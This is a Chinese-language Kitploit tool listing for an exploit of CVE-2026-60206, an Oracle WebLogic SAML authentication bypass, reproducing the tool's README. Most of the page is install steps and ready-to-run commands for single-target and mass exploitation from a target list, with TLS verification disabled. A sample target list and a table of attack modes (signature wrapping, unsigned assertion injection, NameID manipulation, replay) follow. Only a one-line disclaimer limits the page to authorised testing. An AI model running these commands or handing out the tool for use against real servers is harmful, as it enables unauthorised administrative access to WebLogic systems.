Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
POC-CVE-2026-60206 — cve cve-2026-60206 weblogic saml 利用 poc 漏洞 oracle 扫描器 安全 | Kitploit
工具/GitHubGitHub/imbas007/poc-cve-2026-60206
身份验证与授权漏洞扫描器漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubimbas007/poc-cve-2026-60206

POC-CVE-2026-60206

cve cve-2026-60206 weblogic saml 利用 poc 漏洞 oracle 扫描器 安全

查看仓库
32941个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-60206 — Oracle WebLogic SAML 认证绕过

CVE CVSS

CVSS 9.9 — Oracle WebLogic Server Core 中的 SAML 认证绕过。
受影响版本:12.2.1.4.0 14.1.1.0.0 14.1.2.0.0 15.1.1.0.0

⚠️ 仅限授权的安全测试。


安装

root@kitploit:~
git clone https://github.com/imbas007/CVE-2026-60206.git
cd CVE-2026-60206
pip install -r requirements.txt

用法

单个目标

root@kitploit:~
# 检测版本 + SAML 端点
python3 CVE-2026-60206-exploit.py -t https://target:7002 --detect

# 完整利用(所有攻击向量)
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode all -u weblogic

# 特定模式
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode combo -u admin -v

# 使用代理
python3 CVE-2026-60206-exploit.py -t https://target:7002 --mode all --proxy http://127.0.0.1:8080 --no-verify

批量扫描

root@kitploit:~
# 仅检测
python3 CVE-2026-60206-exploit.py -l targets.txt -o results.json

# 检测 + 利用(更快)
python3 CVE-2026-60206-exploit.py -l targets.txt --exploit --no-verify -T 30 -o results.json

# 单 URL 批量模式
python3 CVE-2026-60206-exploit.py -l https://target:7002 --exploit

目标文件(每行一个):

root@kitploit:~
192.168.1.100:7002
https://10.0.0.50
example.com

列出攻击模式

root@kitploit:~
python3 CVE-2026-60206-exploit.py --list-modes

攻击模式


项目结构

root@kitploit:~
CVE-2026-60206/
├── CVE-2026-60206-exploit.py   # 主脚本(单个 + 批量)
├── mass_scan.py                # 批量扫描模块
├── modules/
│   ├── samlib.py               # SAML 操作(XSW、NameID 等)
│   ├── weblogic_client.py      # WebLogic HTTP 客户端
│   └── logger.py               # 彩色日志
├── requirements.txt
└── README.md

参考资料

  • Oracle 2026 年 7 月关键补丁更新
  • NVD:CVE-2026-60206
  • WebLogic SAML CVE-2018-2938 & CVE-2018-2998
下载工具
模式描述
unsigned未签名 SAML 断言注入
xswXML 签名包装(4 种变体)
nameidNameID 操纵 / 注释注入
combo组合:XSW + 未签名 + NameID ⭐
audienceAudienceRestriction 绕过
conditions时间 / 有效性限制绕过
replaySAML 响应重放
all运行所有